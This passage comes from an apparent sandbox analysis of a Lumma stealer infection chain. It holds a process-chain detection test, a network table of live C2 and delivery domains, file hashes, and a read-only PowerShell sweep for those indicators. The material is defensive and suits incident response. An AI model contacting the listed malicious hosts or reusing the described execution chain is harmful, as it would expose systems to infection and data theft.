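    [pscustomobject]@{ ProcessId = 5100; ParentProcessId = 1200; ParentImage = 'C:\Windows\explorer.exe'; Image = $ps; CommandLine = "`"$ps`"" }
)

# Expected: one hit per rule (five rows), each with its lineage back to cmd.exe; the control matches nothing.
Test-ChainRules -Events $SampleEvents | Format-Table -AutoSize -Wrap
# Live hunt: Test-ChainRules -Events (Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ConvertFrom-SysmonProcessCreate)
```

Each rule encodes one observed edge rather than the whole chain, so a variant that swaps forfiles for another proxy still trips the mshta and stdin rules, and the lineage column lets an analyst see at a glance whether a hit sits inside the full cmd > forfiles > powershell > mshta > powershell > powershell > driver.exe > RegAsm.exe pattern.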
Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | dl.dropboxusercontent.com | udp
GB | 162.125.64.15:443 | dl.dropboxusercontent.com | tcp
US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.64.125.162.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | toptendulichmy.com | udp
VN | 202.143.111.175:443 | toptendulichmy.com | tcp
US | 8.8.8.8:53 | 175.111.143.202.in-addr.arpa | udp
US | 8.8.8.8:53 | executivebrakeji.shop | udp
US | 104.21.69.250:443 | executivebrakeji.shop | tcp
US | 8.8.8.8:53 | technologyenterdo.shop | udp
US | 172.67.180.132:443 | technologyenterdo.shop | tcp
US | 8.8.8.8:53 | 250.69.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp
US | 8.8.8.8:53 | problemregardybuiwo.fun | udp
US | 8.8.8.8:53 | detectordiscusser.shop | udp
US | 172.67.195.126:443 | detectordiscusser.shop | tcp
US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp
US | 8.8.8.8:53 | pooreveningfuseor.pw | udp
US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp
US | 104.21.76.253:443 | turkeyunlikelyofw.shop | tcp
US | 8.8.8.8:53 | 132.180.67.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 126.195.67.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 253.76.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | associationokeo.shop | udp
US | 172.67.147.18:443 | associationokeo.shop | tcp
US | 8.8.8.8:53 | 18.147.67.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp

Reading the table:

- dl.dropboxusercontent.com (162.125.64.15:443): the HTA fetched by mshta.exe, the same host as in behavioral1. Dropbox itself is not an indicator; the URL path is.
- toptendulichmy.com (202.143.111.175:443, VN): the first non-Dropbox host in the table and the only connection that is neither the stager nor a C2 candidate. "Downloads MZ/PE file" fires in this run alone, so this is most plausibly where driver.exe came from, although the report does not tie the download to a host.
- Nine .shop/.fun/.pw domains are queried in sequence: five resolve to Cloudflare-fronted addresses (104.21.x.x, 172.67.x.x) and receive a TLS connection, four are queried but never connected. Walking a hard-coded list of candidate domains until one answers is how the Lumma payload inside RegAsm.exe locates its server; all nine belong on a blocklist.
- The in-addr.arpa rows are reverse (PTR) lookups of addresses the VM touched, made by the sandbox or by Windows itself; they are not contacts by the sample and add no indicator beyond the forward lookups already listed.

Files

memory/2844-2-0x0000010429A50000-0x0000010429A72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmkd1iyb.55p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2844-11-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 feadc4e1a70c13480ef147aca0c47bc0
SHA1 d7a5084c93842a290b24dacec0cd3904c2266819
SHA256 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512 c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

(Both files are written by powershell.exe on every start: __PSScriptPolicyTest_*.ps1 probes whether an application-control policy blocks scripts, and StartupProfileData-NonInteractive is the host's startup cache. Neither is attacker content.)

memory/4420-33-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-34-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4420-35-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4420-36-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4440-46-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4440-47-0x000002516FF50000-0x000002516FF60000-memory.dmp

memory/4440-48-0x000002516FF50000-0x000002516FF60000-memory.dmp

memory/4440-49-0x0000025170570000-0x00000251705B4000-memory.dmp

memory/4440-50-0x0000025170640000-0x00000251706B6000-memory.dmp

memory/2844-51-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-52-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-54-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4420-55-0x00000217FBF30000-0x00000217FBF40000-memory.dmp

memory/4440-56-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4440-57-0x000002516FF50000-0x000002516FF60000-memory.dmp

C:\Users\Admin\AppData\Roaming\driver.exe

MD5 79ac171749690f2c947187e34d2b007d
SHA1 ebe8d99c87b7b6b51af10a1260271f7282c8f8d2
SHA256 cdb5f26a44a64a81c8e96db60ba2f4471f88b3980d14f91d3247a0afde34d441
SHA512 c93009d5e20a8ac008e409ad677674aeacc383f0716904825847330ad12ea7347d706754f9c8724e69c0261f2edcb36a41e40f851014e51021b1bccbf7a15f54

C:\Users\Admin\AppData\Roaming\driver.exe

MD5 45ff32c8f82fd612116ebd1b20fa1c19
SHA1 de91cdfa4b34d5526b2d99ad2cdd9f6e465b205e
SHA256 864ed84452a92ae76f154f7abc10540674d5d4490c7c5202329c765ee80c3ae2
SHA512 e0fe7ec8bd84b32d352f9866339b8a589b8c95ec830d3b949162aa752e0f6cb74f9ec904493a727702b471226fdc156658319165443bc4faddabe837365f2992

(Same path, two different contents: the file changed between the two captures during the run. Both SHA256 values are indicators for this sample.)

memory/4440-69-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/4420-72-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

memory/2228-74-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/2228-73-0x0000000000B20000-0x0000000000B70000-memory.dmp

C:\Users\Admin\Videos\Captures\desktop.ini

MD5 b0d27eaec71f1cd73b015f5ceeb15f9d
SHA1 62264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA256 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA512 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

memory/1624-91-0x0000000000400000-0x0000000000449000-memory.dmp

memory/1624-94-0x0000000000400000-0x0000000000449000-memory.dmp

memory/2228-96-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/2228-97-0x0000000003060000-0x0000000005060000-memory.dmp

memory/1624-98-0x00000000012D0000-0x00000000012D1000-memory.dmp

memory/1624-100-0x00000000012D0000-0x00000000012D1000-memory.dmp

memory/1624-99-0x00000000012D0000-0x00000000012D1000-memory.dmp

memory/1624-101-0x0000000000400000-0x0000000000449000-memory.dmp

memory/2228-102-0x0000000003060000-0x0000000005060000-memory.dmp
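Added example (not report output and not the sample's code): a read-only sweep of a Windows host for the indicators this report records in behavioral2, meant for triage of machines that opened the same shortcut. The hashes, domains and registry value come from the sections above; the function name, the Prefetch and script-block-log checks, and the assumption that the host's baseline ConsentPromptBehaviorAdmin is the Windows default of 5 are ours.

```powershell
# Added example, written for this write-up; not report output and not code from the sample.
# Read-only sweep for: the ConsentPromptBehaviorAdmin downgrade, the two driver.exe contents,
# Prefetch evidence of driver.exe, cached lookups of the contacted domains, and the stage-2
# decoder pattern in PowerShell script-block logs (Event ID 4104).
# Run from an elevated PowerShell 5.1+ prompt. Assumptions: the baseline
# ConsentPromptBehaviorAdmin value is the Windows default (5); script-block logging may be
# disabled, in which case that check simply finds nothing.

$Indicators = @{
    DriverExeSha256 = @(
        'cdb5f26a44a64a81c8e96db60ba2f4471f88b3980d14f91d3247a0afde34d441',   # driver.exe, first content
        '864ed84452a92ae76f154f7abc10540674d5d4490c7c5202329c765ee80c3ae2'    # driver.exe, second content
    )
    Domains = @(
        'toptendulichmy.com',                                                  # first non-Dropbox host contacted
        'executivebrakeji.shop', 'technologyenterdo.shop', 'lighterepisodeheighte.fun',
        'problemregardybuiwo.fun', 'detectordiscusser.shop', 'edurestunningcrackyow.fun',
        'pooreveningfuseor.pw', 'turkeyunlikelyofw.shop', 'associationokeo.shop'
    )
    ExpectedConsentPromptBehaviorAdmin = 5
}

function Get-HostIocFindings {
    param([hashtable]$Ioc = $Indicators)
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Check, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Check = $Check; Detail = $Detail })
    }

    # 1. UAC policy value written by the stage-2 PowerShell
    $uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $cpba = (Get-ItemProperty -Path $uacKey -Name ConsentPromptBehaviorAdmin -ErrorAction SilentlyContinue).ConsentPromptBehaviorAdmin
    if ($null -ne $cpba -and $cpba -ne $Ioc.ExpectedConsentPromptBehaviorAdmin) {
        Add-Finding 'UAC' "ConsentPromptBehaviorAdmin = $cpba (0 = elevate without prompting; expected $($Ioc.ExpectedConsentPromptBehaviorAdmin))"
    }

    # 2. Dropped executable in any profile's Roaming folder, hashed against the report
    foreach ($profile in (Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue)) {
        $candidate = Join-Path $profile.FullName 'AppData\Roaming\driver.exe'
        if (Test-Path -LiteralPath $candidate) {
            $hash = (Get-FileHash -LiteralPath $candidate -Algorithm SHA256).Hash.ToLower()
            $match = if ($Ioc.DriverExeSha256 -contains $hash) { 'matches report' } else { 'hash differs from report; inspect anyway' }
            Add-Finding 'File' "$candidate present, SHA256 $hash ($match)"
        }
    }

    # 3. Prefetch records outlive deletion of the executable
    foreach ($pf in (Get-ChildItem -Path 'C:\Windows\Prefetch' -Filter 'DRIVER.EXE-*.pf' -ErrorAction SilentlyContinue)) {
        Add-Finding 'Prefetch' "$($pf.Name) last written $($pf.LastWriteTime)"
    }

    # 4. Resolver cache: cheap, volatile evidence of the C2 domain walk
    if (Get-Command Get-DnsClientCache -ErrorAction SilentlyContinue) {
        foreach ($entry in (Get-DnsClientCache -ErrorAction SilentlyContinue)) {
            if ($Ioc.Domains -contains $entry.Entry) {
                Add-Finding 'DNS' "cached lookup for $($entry.Entry) -> $($entry.Data)"
            }
        }
    }

    # 5. Script-block log: the AES-ECB + gzip decoder text, if logging was enabled
    $blocks = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue
    foreach ($ev in $blocks) {
        if ($ev.Message -match 'CipherMode\]::ECB' -and $ev.Message -match 'GzipStream' -and $ev.Message -match 'TransformFinalBlock') {
            Add-Finding 'ScriptBlock' "event 4104 at $($ev.TimeCreated) contains the stage-2 decoder pattern"
        }
    }

    if ($findings.Count -eq 0) { Add-Finding 'None' 'no indicators from this report found' }
    $findings
}

Get-HostIocFindings | Format-Table -AutoSize -Wrap
```

The sweep changes nothing on the host, so it is safe to run before imaging. A hit on the UAC value alone is worth investigating even when driver.exe is gone, because the payload in RegAsm.exe leaves no file of its own; a DNS-cache hit dates the activity to the current resolver TTL window, so capture it first.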